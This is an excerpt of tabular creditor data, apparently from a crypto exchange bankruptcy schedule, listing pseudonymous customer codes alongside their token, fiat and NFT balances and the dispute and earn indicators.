| 07324485 | | USD[0.00] | Yes | |
| 07324486 | | DOGE[1], GRT[3.17946346], TRX[3], USD[0.00] | Yes | |
| 07324487 | | USD[0.01] | Yes | |
| 07324489 | | BTC[.00000061], CUSDT[4], DOGE[4.10419053], NFT (395558885702466507/Imola Ticket Stub #706)[1], TRX[1], USD[0.00], USDT[1.10393971] | Yes | |
| 07324490 | | BCH[2.36799327], BTC[.04020352], CUSDT[3], DOGE[2301.62999373], ETH[1.81193659], ETHW[1.81193659], TRX[3], USD[0.00] | | |
| 07324491 | | DOGE[2985.0248568], TRX[6260.1805057], USD[10.01] | | |
| 07324492 | | BTC[0], DOGE[0] | | |
| 07324494 | | DOGE[0] | | |
| 07324495 | | USD[20.00] | | |
| 07324496 | | USD[10.00] | | |
| 07324497 | | BTC[0], DOGE[1.00001442], USD[10.00] | | |
| 07324498 | Contingent, Disputed | BTC[.00021404], USD[0.00] | | |
| 07324499 | | CUSDT[1], SUSHI[30.65656794], USD[10.00] | | |
| 07324500 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07324501 | | DOGE[0], ETH[0.00000001], TRX[0], USD[0.00], USDT[0] | | |
| 07324502 | | USD[10.00] | | |
| 07324503 | | BRZ[6.42676622], CUSDT[5], ETH[0], GRT[.00003777], SHIB[153.55405180], TRX[8], USD[0.00], USDT[0.00005621] | Yes | |
| 07324504 | | USD[10.00] | | |
| 07324505 | | USD[10.00] | | |
| 07324506 | | DOGE[8100.38215], LINK[11.76811722], USD[0.00] | | |
| 07324507 | | USD[10.00] | | |
| 07324508 | | TRX[218.81268299], USD[0.00] | | |
| 07324509 | | USD[10.00] | | |
| 07324510 | | BAT[1.01381983], BRZ[6.28734667], BTC[.01210394], CUSDT[13], DOGE[7.12226240], ETH[.19448188], ETHW[.19426881], LINK[0], LTC[0], SHIB[12], SOL[8.76493339], SUSHI[0], TRX[15.32050107], USD[0.00], USDT[4.33175455] | Yes | |
| 07324511 | | SHIB[1], USD[0.01] | | |
| 07324512 | | USD[10.00] | | |
| 07324513 | | BAT[2], BRZ[2], CUSDT[10], SHIB[4], SUSHI[.0000175], USD[0.00] | | |
| 07324515 | | DOGE[0], ETH[0], ETHW[0] | | |
| 07324517 | | USD[0.00] | | |
| 07324518 | | USD[10.00] | | |
| 07324519 | | USD[0.01] | | |
| 07324520 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324521 | | USD[10.00] | | |
| 07324522 | | BAT[13.64756251], USD[0.00] | Yes | |
| 07324523 | | USD[10.00] | | |
| 07324525 | | USD[10.00] | | |
| 07324527 | | CUSDT[1], DOGE[32.58964012], TRX[1], USD[50.25] | | |
| 07324529 | | CUSDT[1], USD[24.13] | | |
| 07324530 | | USD[10.00] | | |
| 07324531 | | BF_POINT[200], BRZ[1], CUSDT[1], DOGE[4], TRX[1], USD[0.10], USDT[1.07218236] | Yes | |
| 07324532 | | CUSDT[4], DOGE[1513.88086231], ETHW[.10815808], SHIB[3], USD[0.00] | Yes | |
| 07324533 | | BAT[1], CUSDT[2], DOGE[159.26477353], LTC[.00012627], TRX[1], USD[0.00] | | |
| 07324534 | | USD[0.00], USDT[0] | | |
| 07324535 | | USD[10.00] | | |
| 07324536 | | USD[0.00] | | |
| 07324537 | | USD[10.00] | | |
| 07324538 | | CUSDT[1], USD[866.78] | Yes | |
| 07324539 | | TRX[.000002], USD[2.64], USDT[0] | | |
| 07324541 | | BRZ[1], CUSDT[8], GRT[13.33141103], SHIB[2570.12885363], TRX[2], USD[0.00] | | |
| 07324542 | | DOGE[30.84816507], USD[0.00] | | |
| 07324543 | | USD[10.00] | | |
| 07324545 | | USD[10.00] | | |
| 07324546 | | BTC[.00051302], CUSDT[3], DOGE[65.71914209], ETH[.00553252], ETHW[.00553252], TRX[2], USD[0.01], USDT[24.76034364] | | |
| 07324547 | | USD[10.00] | | |
| 07324548 | | BRZ[4], CUSDT[3], GRT[1.00265187], LINK[1.10830638], SHIB[3], SUSHI[5.2171088], TRX[135.24679572], USD[0.00], USDT[1.08480132] | Yes | |
| 07324549 | | BRZ[2], BTC[.00573695], DOGE[1], ETH[.17233102], ETHW[.17233102], USD[0.90] | | |
| 07324550 | | TRX[2], USD[0.01] | Yes | |
| 07324551 | | DOGE[30.917], USD[0.21] | | |
| 07324553 | | CUSDT[3], DOGE[0], ETH[0], TRX[1], USD[10.00] | | |
| 07324554 | | USD[10.00] | | |
| 07324555 | | BTC[0], DOGE[2248.968], ETH[.75], ETHW[.75], USD[9.38] | | |
| 07324556 | | USD[10.00] | | |
| 07324557 | | USD[10.00] | | |
| 07324558 | | USD[0.00] | | |
| 07324559 | | USD[10.00] | | |
| 07324560 | | USD[10.00] | | |
| 07324561 | | CUSDT[1], DOGE[0], SUSHI[0], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07324562 | | USD[10.00] | | |
| 07324564 | | USD[10.00] | | |
| 07324566 | | DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07324567 | | GRT[1], USD[0.01] | | |
| 07324569 | | BTC[.00916504], DOGE[656.052], ETH[.4453014], ETHW[.4453014], USD[30.39], USDT[.00103513] | | |
| 07324570 | | DOGE[0.00038433], EUR[0.00], USD[32.19] | | |
| 07324571 | | USD[0.00] | | |
| 07324572 | | USD[10.00] | | |
| 07324574 | | CUSDT[1], DOGE[23.07692272], USD[0.00] | | |
| 07324575 | | CUSDT[2], DOGE[1], MATIC[29.53715093], SUSHI[1.39532074], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07324576 | | CUSDT[3], DOGE[92.4165015], USD[0.82] | | |
| 07324578 | | USD[10.00] | | |
| 07324579 | | USD[10.00] | | |
| 07324580 | | USD[0.00], USDT[9.82137984] | | |
| 07324581 | | BRZ[1], CUSDT[2], DOGE[11.81955679], USD[0.00] | Yes | |
| 07324582 | | BCH[0], BRZ[1], CUSDT[3], TRX[7], UNI[0], USD[0.00] | | |
| 07324583 | | USD[10.00] | | |
| 07324584 | | GRT[1], USD[340.25], USDT[9.94009986] | | |
| 07324585 | | CUSDT[2], DOGE[1], GRT[.00008411], NFT [293402470744896542/FTX - Off The Grid Miami #3555][1], NFT [297202952684731021/FTX - Off The Grid Miami #3663][1], NFT [303101156979471526/FTX - Off The Grid Miami #3650][1], NFT [305499304469763254/FTX - Off The Grid Miami #3465][1], NFT [315355638592342850/Entrance Voucher #3039][1], NFT [316607039220525589/FTX - Off The Grid Miami #3670][1], NFT [327955313077774144/FTX - Off The Grid Miami #3553][1], NFT [360437251727155016/FTX - Off The Grid Miami #3665][1], NFT [378527492847594429/FTX - Off The Grid Miami #3661][1], NFT [396210246498915958/FTX - Off The Grid Miami #3557][1], NFT [397194981281619508/FTX - Off The Grid Miami #3458][1], NFT [413561767164112268/FTX - Off The Grid Miami #3463][1], NFT [469122669204628901/FTX - Off The Grid Miami #3654][1], NFT [508914807893587555/FTX - Off The Grid Miami #3652][1], NFT [517538115222612190/FTX - Off The Grid Miami #3648][1], NFT [522960120482525169/FTX - Off The Grid Miami #3551][1], NFT [541186116951493183/FTX - Off The Grid Miami #3667][1], NFT [547434245606316275/FTX - Off The Grid Miami #3657][1], NFT [562105812258691939/FTX - Off The Grid Miami #3656][1], SHIB.00000005], USD[6.05] | Yes | |
| 07324586 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324587 | | DOGE[1001.976], USD[0.09] | | |
| 07324588 | | CUSDT[2], DOGE[1.00002787], TRX[28.98268224], USD[0.01] | | |
| 07324589 | | CUSDT[1], USD[32.40] | | |
| 07324590 | | DOGE[76.71319001], USD[0.12] | | |
| 07324591 | | CUSDT[2], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07324594 | | DOGE[.00003226], TRX[1.000002], USD[0.08] | | |
| 07324596 | | USD[0.00] | | |
| 07324597 | | DOGE[13081.464], SHIB[11488500], USD[5.26] | | |
| 07324599 | | USD[10.00] | | |
| 07324600 | | CUSDT[1], DOGE[2365.59467486], USD[10.00] | | |
| 07324601 | | USD[10.00] | | |
| 07324602 | | BRZ[1], CUSDT[15], DOGE[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07324605 | | CUSDT[3], USD[0.00] | | |
| 07324606 | | BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0.00000083], YFI[0] | | |
| 07324607 | | TRX[163.47273634], USD[0.00] | | |
| 07324609 | | BRZ[3], CUSDT[16], DOGE[3433.13036801], SHIB[2], TRX[7], UNI[.07929822], USD[0.00], USDT[0] | Yes | |
| 07324610 | | USD[10.00] | | |
| 07324611 | | USD[10.00] | | |
| 07324612 | | USD[10.00] | | |
| 07324613 | | BRZ[1], TRX[3], USD[0.21] | | |
| 07324616 | | DOGE[896.6498457], TRX[2], USD[0.00] | | |
| 07324617 | | BTC[0], DOGE[0.97524042], ETH[0], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07324618 | | BTC[0.01852948], DOGE[0], ETH[.1794819], ETHW[9.03027765], NEAR[51.14034256], SHIB[3], USD[0.00], USDT[0.00000001] | Yes | |
| 07324623 | | BAT[3.14413953], BF_POINT[100], BRZ[2], CUSDT[9], DOGE[1], TRX[2], USD[0.06] | | |
| 07324624 | | BRZ[1], BTC[.00844274], CUSDT[3319.53394691], DOGE[5796.67278545], ETH[.15049432], ETHW[.15049432], LTC[.30345439], TRX[2514.50094846], USD[100.00] | | |
| 07324625 | | BRZ[1], CUSDT[2], DOGE[3913.47274928], TRX[1], USD[0.00] | | |
| 07324626 | | DOGE[13.60612593], USD[0.00] | | |
| 07324627 | Contingent, Disputed | DOGE[.2826171], USD[0.00], USDT[0] | | |
| 07324628 | | DOGE[1536.14487443], TRX[1], USD[10.00] | | |
| 07324629 | | USD[10.00] | | |
| 07324630 | | BAT[1.01278075], BRZ[8.46236445], CUSDT[29], DOGE[3], ETH[.00003199], ETHW[.00003199], GRT[1], LINK[2.19813188], LTC[8.10488479], SOL[67.72019795], SUSHI[70.78016652], TRX[18.26284074], USD[5249.98], USDT[1.05973055] | Yes | |
| 07324631 | | USD[10.00] | | |
| 07324632 | | USD[10.00] | | |
| 07324633 | | DOGE[25.84751614], USD[0.00] | | |
| 07324634 | | DOGE[.94695], USD[0.00] | | |
| 07324635 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07324636 | Contingent, Disputed | NFT (37295401697675248/Romeo #190)[1], NFT (450052288305940274/Paradigm Shift)[1], NFT (475067837463122163/Humpty Dumpty #329)[1] | | |
| 07324637 | | USD[10.00] | | |
| 07324638 | | BTC[.00333217], CUSDT[7], DOGE[2749.49723992], ETH[.04619973], ETHW[.04562517], SOL[4.03561612], TRX[1], USD[0.00] | Yes | |
| 07324639 | | BTC[0], DOGE[1681.36194768], ETH[.15889552], ETHW[.15889552], SHIB[1142394.8223955], USD[0.00] | | |
| 07324640 | | USD[10.00] | | |
| 07324641 | | USD[10.00] | | |
| 07324642 | | BTC[0], CUSDT[5], DOGE[1], TRX[2], USD[0.01] | | |
| 07324643 | | AAVE[0], BF_POINT[200], BTC[0], CUSDT[0], ETH[0], NFT (516838795602408841/FTX Crypto Cup 2022 Key #2382)[1], SHIB[3], SOL[0], USD[0.01], WBTC[0] | Yes | |
| 07324645 | | CUSDT[1], USD[0.00], USDT[1] | | |
| 07324647 | | BTC[0], USD[0.01] | | |
| 07324648 | | BTC[0], CUSDT[0], DOGE[0], GRT[0], LINK[0], TRX[0], USD[0.01], USDT[0] | | |
| 07324649 | | MATIC[10.84210523], TRX[1], USD[0.00] | Yes | |
| 07324650 | | USD[10.00] | | |
| 07324652 | | USD[0.01] | | |
| 07324653 | | USD[10.00] | | |
| 07324654 | | USD[10.00] | | |
| 07324655 | | BAT[0], CUSDT[1], DOGE[139.11389363], ETH[0.01218360], ETHW[0.01203312], GRT[0], LTC[0], SHIB[158906.79493347], SOL[0.28952587], TRX[0], USD[0.00] | Yes | |
| 07324657 | | LINK[.23520927], USD[0.00] | Yes | |
| 07324658 | | USD[0.01], USDT[0] | | |
| 07324659 | | USD[0.00] | | |
| 07324660 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07324661 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324662 | | BTC[.00020546], USD[0.00] | | |
| 07324663 | | USD[10.00] | | |
| 07324665 | | USD[10.00] | | |
| 07324666 | | USD[10.00] | | |
| 07324667 | | CUSDT[4], DOGE[65.72129096], USD[169.54] | | |
| 07324668 | | BAT[1], CUSDT[2], DOGE[.00004646], TRX[4], USD[0.01] | | |
| 07324669 | | CUSDT[471.94878394], DOGE[301.72527789], ETH[.0080496], ETHW[.0080496], USD[0.81], USDT[9.93612926] | | |
| 07324670 | | USD[10.00] | | |
| 07324671 | | USD[0.18], USDT[0] | | |
| 07324673 | | USD[10.00] | | |
| 07324674 | | CUSDT[1], USD[0.00] | | |
| 07324676 | | USD[0.00] | Yes | |
| 07324677 | | BTC[.00000041], USD[0.00] | | |
| 07324681 | | DOGE[.404], USD[0.43] | | |
| 07324682 | | CUSDT[4], USD[0.01] | | |
| 07324685 | | CUSDT[4], DOGE[0], USD[0.00] | | |
| 07324686 | | AAVE[2.45424397], BAT[.02058904], BRZ[5.04903685], BTC[.00000802], CUSDT[15], DOGE[18.87449783], ETH[0], ETHW[15.52665737], GRT[730.80265228], LINK[25.68915117], LTC[7.08826926], MATIC[715.2073507], MKR[.20508077], SOL[254.2457347], SUSHI[.00073664], TRX[19680.14848885], UNI[29.36552031], USD[101770.18], USDT[7.22282195] | Yes | |
| 07324687 | | DOGE[27.83653916], TRX[1], USD[0.00] | | |
| 07324688 | | USD[10.00] | | |
| 07324691 | | CUSDT[1], SOL[0], USD[0.00] | Yes | |
| 07324692 | | BTC[0], DOGE[0], ETH[0.02267965], ETHW[0.02267965], TRX[1], USD[10.00] | | |
| 07324693 | | BTC[.00000007], CUSDT[1], DOGE[.0015582], ETH[.000001], ETHW[.000001], SOL[.00004789], TRX[.00618545], USD[0.00], USDT[0.00000001] | | |
| 07324694 | | USD[0.00] | | |
| 07324695 | | CUSDT[2], GRT[1.28749401], TRX[1], USD[0.48], USDT[.99400998] | | |
| 07324696 | | USD[10.00] | | |
| 07324697 | | DOGE[1618.67024724], USD[0.00] | | |
| 07324698 | | EUR[102.22], GBP[89.76], SHIB[2], USD[1521.99] | Yes | |
| 07324699 | | CUSDT[37], DOGE[2], GRT[427.97109593], SOL[11.24022469], USD[0.00], USDT[0] | Yes | |
| 07324700 | | CUSDT[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07324701 | | BTC[.06209062], DOGE[1], GRT[1], USD[110.00] | | |
| 07324702 | | CUSDT[1], DOGE[158.08732047], USD[0.00] | | |
| 07324703 | | USD[10.00] | | |
| 07324704 | | USD[10.00] | | |
| 07324707 | | USD[10.00] | | |
| 07324708 | | BAT[1], BCH[.1301638], BRZ[1], BTC[.00342239], CUSDT[3], DOGE[11128.92175713], ETH[.02389331], ETHW[.02389331], TRX[1], USD[0.00], USDT[1] | | |
| 07324709 | | BRZ[1], CUSDT[1], GRT[1.00498957], USD[44.27] | Yes | |
| 07324710 | | DOGE[5976.12051864], USD[0.00] | | |
| 07324711 | | BTC[0], ETH[0.04385644], ETHW[0.04385644], USD[0.00], USDT[0.00000001] | | |
| 07324713 | | USD[10.00] | | |
| 07324714 | | USD[0.00], USDT[1] | | |
| 07324715 | | DOGE[1], MATIC[.00022371], SHIB[1], USD[0.00] | Yes | |
| 07324716 | | BCH[.005962], BTC[0], CUSDT[.9594], DAI[.09056], ETHW[.1359354], LTC[.0098195], NFT [36834310421123459/Box][1], SOL[0], SUSHI[.499525], USD[943.77], USDT[0.00495454] | | |
| 07324717 | | DOGE[754.05514472], EUR[8.32], USD[0.00] | | |
| 07324718 | | SOL[.05212034], USD[0.00] | | |
| 07324719 | | USD[10.00] | | |
| 07324720 | | USD[10.00] | | |
| 07324721 | | DOGE[110.33344879], USD[2.70], USDT[0] | Yes | |
| 07324722 | | CUSDT[2], DOGE[13885.30123637], GRT[1], USD[0.00] | | |
| 07324723 | | ETH[0], USD[0.01] | | |
| 07324724 | | CUSDT[2], USD[0.00] | | |
| 07324725 | | ETH[.00000001], ETHW[0], NFT (326591263189953917/Humpty Dumpty #954)[1], NFT (419385287167796945/Entrance Voucher #2932)[1], USD[0.00] | Yes | |
| 07324726 | | BRZ[0], DOGE[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07324727 | | BTC[0], USD[0.54] | | |
| 07324728 | | BAT[776.450072], BCH[1.10548675], BRZ[6.61680479], CUSDT[13], DOGE[866.95586325], ETHW[51.92236047], GRT[3.16724858], LINK[1.10280082], SHIB[133894239.35792815], SOL[22.36990216], SUSHI[131.94313566], TRX[4], UNI[1.10280082], USD[3193.86], USDT[3.30217709] | Yes | |
| 07324729 | | BRZ[3], CUSDT[3], DOGE[701.07744274], ETH[.03275384], ETHW[.03275384], TRX[1], USD[0.51] | | |
| 07324730 | | BRZ[1], CUSDT[1], TRX[4], USD[0.00] | | |
| 07324731 | | AAVE[0], ALGO[0.00083018], BAT[1], BCH[0], BRZ[2], BTC[0.00000001], CUSDT[0.51168778], DOGE[123.14913349], ETH[0.00293296], ETHW[0.47186884], EUR[0.00], GRT[105.70673714], HKD[0.00], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0.00000093], NEAR[0], NFT (473365569796440269/Ronin Duckie #04)[1], PAXG[0], SHIB[1], SOL[0], SUSHI[18.17882865], TRX[1], UNI[0], USD[0.00], YFI[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324732 | | USD[10.00] | | |
| 07324733 | | BTC[.00094443], CUSDT[1], DOGE[6610.93611763], TRX[1], USD[0.00] | | |
| 07324734 | | USD[10.00] | | |
| 07324735 | | BCH[0], BTC[.00019072], CUSDT[1], DOGE[0.00003793], UNI[.00179669], USD[0.00] | | |
| 07324737 | | BRZ[2], CUSDT[2], DOGE[.00007553], SOL[.0000295], TRX[1], USD[0.00] | | |
| 07324738 | | DOGE[.06351914], USD[0.00] | | |
| 07324740 | | DOGE[732.86465], UNI[16.33768], USD[1.73], USDT[0.00843717] | | |
| 07324741 | | BAT[1], BRZ[1], CUSDT[1], SUSHI[1], TRX[1], USD[0.00] | | |
| 07324742 | | USD[10.00] | | |
| 07324744 | | DOGE[.704], USD[0.64] | | |
| 07324745 | | BTC[.02348234], CUSDT[2], DOGE[1.03068935], SHIB[5], USD[-55.30] | Yes | |
| 07324746 | | BRZ[1], DOGE[9545.9253422], TRX[3], USD[0.00] | Yes | |
| 07324747 | | USD[10.00] | | |
| 07324748 | | USD[10.00] | | |
| 07324749 | | USD[10.00] | | |
| 07324750 | | USD[10.00] | | |
| 07324751 | | USD[10.00] | | |
| 07324752 | | BTC[.00001181], USD[0.00] | | |
| 07324753 | | CUSDT[1], DOGE[42.22594232], SHIB[2], TRX[.00004975], USD[0.30] | | |
| 07324754 | | BTC[.01795994], CUSDT[10], DOGE[584.55422793], ETH[.35578291], ETHW[.35724658], SOL[.80079544], TRX[4], USD[-500.00] | Yes | |
| 07324755 | | USD[10.00] | | |
| 07324757 | | BRZ[1], CUSDT[2], DOGE[4], GRT[2], TRX[9], USD[0.00], USDT[1] | | |
| 07324759 | Contingent, Disputed | AUD[0.00], BAT[53.17837568], BRZ[0.14848371], BTC[0.00000006], CUSDT[30.71988504], DOGE[1.22257420], ETH[0.00000095], ETHW[0.00000095], GRT[51.03895276], LINK[0.00649256], SOL[0.00612103], SUSHI[0], TRX[1], UNI[0.00092121], USD[0.00] | | |
| 07324760 | | BCH[0], BRZ[0], CUSDT[1], DOGE[3.94952660], ETH[0.00029554], ETHW[0.00029554], SOL[0.02899888], SUSHI[0], TRX[3], USD[0.00], USDT[0] | | |
| 07324762 | | USD[10.00] | | |
| 07324764 | | USD[10.00] | | |
| 07324765 | | USD[10.00] | | |
| 07324766 | | BRZ[1], CUSDT[1], SHIB[18032861.09252101], TRX[1], USD[0.25] | Yes | |
| 07324767 | | BAT[46.37869599], BRZ[4], BTC[.1507532], CUSDT[47], DAI[.63767716], DOGE[1997.07250398], ETH[.0108985], ETHW[.0108985], GRT[19.82886519], LINK[1.53834653], PAXG[.19017963], SUSHI[50.42519795], TRX[1113.51289187], UNI[11.22021463], USD[1644.00], USDT[0] | | |
| 07324768 | | BRZ[2], DOGE[0], ETH[0], GRT[0], SOL[.20567942], TRX[3], USD[0.00], USDT[1] | | |
| 07324770 | | USD[0.01] | | |
| 07324771 | | BRZ[1], CUSDT[2], DOGE[17594.29769752], TRX[1], USD[386.07] | | |
| 07324773 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07324774 | | USD[10.00] | | |
| 07324777 | | USD[10.00] | | |
| 07324778 | | BAT[0], DOGE[1], TRX[0], USD[0.00] | Yes | |
| 07324780 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00], YFI[0] | Yes | |
| 07324782 | | BAT[1], BRZ[1], CUSDT[1], DOGE[82.8023266], USD[3.85] | | |
| 07324783 | | BAT[.34765667], BRZ[4], BTC[0], CUSDT[3], DOGE[1.71812881], GRT[1.92501514], SUSHI[.00003146], TRX[.99656699], USD[0.01] | | |
| 07324784 | | BRZ[1], CUSDT[1], TRX[3], USD[0.00] | | |
| 07324785 | | DOGE[.01495784], USD[0.00] | | |
| 07324786 | | CUSDT[1], NFT (297440110756831783/Bahrain Ticket Stub #186)[1], USD[0.00] | Yes | |
| 07324788 | | USD[10.00] | | |
| 07324789 | | ETHW[.4], USD[0.00], USDT[0] | | |
| 07324790 | | USD[0.00] | | |
| 07324791 | | ETH[.00516008], ETHW[.00516008], USD[0.00] | | |
| 07324793 | | BRZ[1], DOGE[101.37002583], USD[0.01] | | |
| 07324794 | | USD[0.01] | | |
| 07324795 | | CUSDT[4], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07324796 | | USD[10.00] | | |
| 07324797 | | USD[10.00] | | |
| 07324798 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07324799 | | USD[10.00] | | |
| 07324800 | | USD[10.00] | | |
| 07324801 | | CUSDT[4], USD[0.00] | Yes | |
| 07324802 | | BTC[.00124101], CUSDT[2], DOGE[5.1029632], ETH[.16334374], ETHW[.16289823], GRT[124.66635463], SUSHI[1.10011059], USD[0.00] | Yes | |
| 07324803 | | BRZ[1], USD[26573.45], USDT[1.00011606] | Yes | |
| 07324804 | | CUSDT[1], DOGE[2308.37233267], SHIB[420136.3292975], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324805 | | USD[10.00] | | |
| 07324806 | | BRZ[0], DOGE[0], SOL[0], USD[0.09] | Yes | |
| 07324807 | | BAT[1], BRZ[2], CUSDT[3], TRX[2], USD[0.00], USDT[2] | | |
| 07324808 | | DOGE[1], USD[0.00] | | |
| 07324811 | | USD[0.00] | | |
| 07324812 | | USD[10.00] | | |
| 07324813 | | DOGE[17.92800000], USD[0.12] | | |
| 07324814 | | USD[0.00] | | |
| 07324815 | | SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07324816 | | CUSDT[1], TRX[.67417188], USD[23.38] | | |
| 07324817 | | BRZ[2], BTC[.00102338], CUSDT[2], DOGE[1194.66265445], ETH[.01336837], ETHW[.01336837], SHIB[215590.48717603], SOL[.13958554], USD[0.00] | | |
| 07324818 | | CUSDT[1], DOGE[1.00002893], USD[0.00] | | |
| 07324819 | | USD[10.00] | | |
| 07324820 | | USD[10.00] | | |
| 07324821 | | AVAX[0.00253938], SOL[.00080473], USD[0.00] | | |
| 07324823 | | SUSHI[.64431221], USD[0.00] | Yes | |
| 07324825 | | USD[10.00] | | |
| 07324826 | | BAT[0], BRZ[0], DOGE[0], KSHIB[0], LTC[0], MATIC[0], MKR[0], SHIB[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07324829 | | USD[10.00] | | |
| 07324831 | | BCH[1.17380975], BTC[0], DOGE[1163.73872880], ETH[0.22140472], ETHW[0.22118656], GRT[0], SHIB[7939.36818652], SOL[3.36720736], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07324832 | | USD[10.00] | | |
| 07324833 | | ETH[0], GRT[1], PAXG[0.00000001], TRX[1], USD[0.00] | Yes | |
| 07324834 | | USD[10.00] | | |
| 07324836 | Contingent, Disputed | DOGE[0], ETH[0], ETHW[0], UNI[0] | | |
| 07324837 | | BRZ[1], CUSDT[4], SHIB[1505131.27046184], USD[0.00] | Yes | |
| 07324838 | | DOGE[12502.643] | | |
| 07324839 | | BTC[0.00297453], USD[10.00] | | |
| 07324840 | | USD[10.00] | | |
| 07324842 | | BTC[0], CUSDT[6], ETH[0], LINK[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07324843 | | BRZ[0], DOGE[0], TRX[1], USD[0.00], USDT[0] | | |
| 07324844 | | USD[10.00] | | |
| 07324845 | | BRZ[1], BTC[.00142147], CUSDT[4], DOGE[6571.34970528], ETH[.01014191], ETHW[.01001879], SHIB[754486.02815114], TRX[2], USD[0.43] | Yes | |
| 07324846 | | CUSDT[1], DOGE[90.59633852], USD[0.00] | | |
| 07324847 | | USD[0.01], USDT[0] | | |
| 07324848 | | BRZ[1], BTC[0], DAI[0], DOGE[2], ETH[0], ETHW[3.1395139Ø], GRT[0], LINK[0], LTC[0], NFT (307295434151558390/ApexDucks #7365)[1], NFT (404274680058855451/Magic Eden Pass)[1], SHIB[274254.00779551], SOL[11.82505007], USD[0.00], USDT[0] | Yes | |
| 07324849 | | USD[10.00] | | |
| 07324850 | | BRZ[1], CUSDT[2], ETHW[0.57201353], USD[0.00] | Yes | |
| 07324851 | | DOGE[.276], USD[0.00] | | |
| 07324852 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07324855 | | USD[10.00] | | |
| 07324857 | | BRZ[1], SHIB[2], TRX[1], USD[72.29], USDT[0.00000001] | | |
| 07324859 | | DOGE[.224], USD[0.01] | | |
| 07324860 | | BTC[.00018117], USD[0.00] | | |
| 07324861 | | DOGE[1], SOL[0.45515922], USD[0.00] | | |
| 07324864 | | CUSDT[1], LINK[2.48427564], TRX[1], USD[0.00] | | |
| 07324866 | | USD[0.00], USDT[0] | | |
| 07324867 | | CUSDT[1], DOGE[1.05815163], USD[0.09] | | |
| 07324869 | | BRZ[2], CUSDT[3], DOGE[1.00253715], SHIB[2], TRX[4], USD[0.00] | | |
| 07324870 | | BTC[.00020992], USD[0.00] | Yes | |
| 07324871 | | BTC[.0000592], DOGE[.196], USD[2.79] | | |
| 07324872 | | BTC[0], DOGE[0.08613321], GRT[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07324873 | | BAT[6.8443598], CUSDT[3], DOGE[285.95837819], USD[0.12], USDT[0.00016890] | | |
| 07324874 | | USD[10.00] | | |
| 07324877 | | BTC[.00016027], CUSDT[2], SHIB[1.78662], USD[0.00] | Yes | |
| 07324878 | | USD[10.00] | | |
| 07324880 | | BAT[.00001847], CUSDT[3], DOGE[1], LTC[.00001934], SOL[0.00001159], TRX[.02474196], USD[0.00] | | |
| 07324883 | | BCH[.02450303], BRZ[1], BTC[.00002242], CUSDT[10], DOGE[.32244265], ETH[.25980795], ETHW[.26129354], SHIB[3468913.17501557], TRX[4], USD[-153.73] | Yes | |
| 07324884 | | USD[10.00] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324885 | | BRZ[2], CUSDT[13], DOGE[411.30977891], GRT[1], LINK[.00622334], LTC[.4076985], TRX[4961.80440932], USD[0.92] | | |
| 07324887 | | USD[10.00] | | |
| 07324888 | | USD[11.02] | Yes | |
| 07324889 | | DOGE[1], USD[0.01] | | |
| 07324890 | | BTC[0.00001154], DOGE[.35025], ETH[.9709], ETHW[.9709], MATIC[3.68983411], NFT (293368156835575872/DJ Scot-T)[1], NFT (312382223637991689/3D Scot-T)[1], NFT (348852460898290450/Star Wars Scot-T)[1], NFT (354236307069488490/Wolf Of Wall Street Scot-T)[1], NFT (354976097844207313/White Scot-T)[1], NFT (463352800648221775/Bing Bong)[1], NFT (465346116131903729/King Scot-T)[1], NFT (538318250351706081/Unreleased Music)[1], NFT (551193557487317727/XRP Scot-T)[1], NFT (557532363580617742/Naurto Scot-T)[1], NFT (572445226142294144/Star Wars Scot-T #2)[1], NFT (574526219683742533/Squid Game Scot-T)[1], SOL[.36744391], USD[0.23], USDT[0.00000001] | | |
| 07324892 | | CUSDT[1], USD[17.53] | | |
| 07324894 | | DOGE[6276.77580524], USD[0.00] | | |
| 07324895 | | USD[10.00] | | |
| 07324896 | | TRX[1], USD[0.00] | | |
| 07324897 | | DOGE[230.24206499], USD[10.00] | | |
| 07324899 | | USD[10.00] | | |
| 07324900 | | USD[0.00] | | |
| 07324902 | | USD[10.00] | | |
| 07324905 | | USD[10.00] | | |
| 07324907 | | DOGE[.651] | | |
